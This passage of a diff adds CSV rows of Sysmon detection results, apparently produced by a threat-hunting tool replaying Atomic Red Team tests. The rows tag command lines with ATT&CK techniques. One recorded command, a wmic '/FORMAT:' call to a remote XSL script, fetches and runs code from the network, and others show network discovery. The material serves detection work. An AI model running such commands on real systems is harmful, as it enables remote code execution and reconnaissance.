+    <Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
+    <Data Name=""ParentProcessId"">1988</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547882.333688,2019-07-19T18:51:22.333688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:22.314203Z"">
+    </TimeCreated>
+    <EventRecordID>3770</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:22.302</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
+    <Data Name=""ProcessId"">1988</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net  view /domain ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:09.845415Z"">
+    </TimeCreated>
+    <EventRecordID>3769</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:09.839</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-001043953300</Data>
+    <Data Name=""ProcessId"">3012</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">net  view /domain</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
+    <Data Name=""ParentProcessId"">4856</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1018] Remote System Discovery - Process,1563547882.314203,2019-07-19T18:51:22.314203+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net  view /domain ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:09.845415Z"">
+    </TimeCreated>
+    <EventRecordID>3769</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:09.839</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-001043953300</Data>
+    <Data Name=""ProcessId"">3012</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">net  view /domain</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
+    <Data Name=""ParentProcessId"">4856</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547869.845415,2019-07-19T18:51:09.845415+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:09.823311Z"">
+    </TimeCreated>
+    <EventRecordID>3768</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:09.804</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8DD-5D31-0000-0010EF923300</Data>
+    <Data Name=""ProcessId"">4856</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view /domain&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547869.823311,2019-07-19T18:51:09.823311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:06.888030Z"">
+    </TimeCreated>
+    <EventRecordID>3767</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:06.873</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-00100D8A3300</Data>
+    <Data Name=""ProcessId"">4016</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1563547866.88803,2019-07-19T18:51:06.888030+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic.exe  process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:06.753240Z"">
+    </TimeCreated>
+    <EventRecordID>3766</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:06.748</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-001029863300</Data>
+    <Data Name=""ProcessId"">3220</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">WMI Commandline Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">wmic.exe  process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
+    <Data Name=""ParentProcessId"">5340</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:06.728089Z"">
+    </TimeCreated>
+    <EventRecordID>3765</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:06.714</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
+    <Data Name=""ProcessId"">5340</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1563547866.75324,2019-07-19T18:51:06.753240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:06.728089Z"">
+    </TimeCreated>
+    <EventRecordID>3765</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:06.714</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8DA-5D31-0000-0010D3833300</Data>
+    <Data Name=""ProcessId"">5340</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1603194656.569246,2020-10-20T15:50:56.569246+04:00,,Threat,Low,Found User (DESKTOP-NTSSLJD\den) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-20T11:50:56.569102Z"">
+    </TimeCreated>
+    <EventRecordID>988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""7212"" ThreadID=""9748"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>DESKTOP-NTSSLJD</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1059.003,technique_name=Windows Command Shell</Data>
+    <Data Name=""UtcTime"">2020-10-20 11:50:56.472</Data>
+    <Data Name=""ProcessGuid"">23F38D93-CF20-5F8E-D008-000000000C00</Data>
+    <Data Name=""ProcessId"">9620</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">DESKTOP-NTSSLJD\den</Data>
+    <Data Name=""LogonGuid"">23F38D93-AE9B-5F8E-A2EC-170000000000</Data>
+    <Data Name=""LogonId"">0x17eca2</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">23F38D93-CF20-5F8E-CE08-000000000C00</Data>
+    <Data Name=""ParentProcessId"">6896</Data>
+    <Data Name=""ParentImage"">C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe</Data>
+  </EventData>
+</Event>",DESKTOP-NTSSLJD,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547866.728089,2019-07-19T18:51:06.728089+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:50:56.182990Z"">
+    </TimeCreated>
+    <EventRecordID>3764</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:50:56.162</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8D0-5D31-0000-001034673300</Data>
+    <Data Name=""ProcessId"">396</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
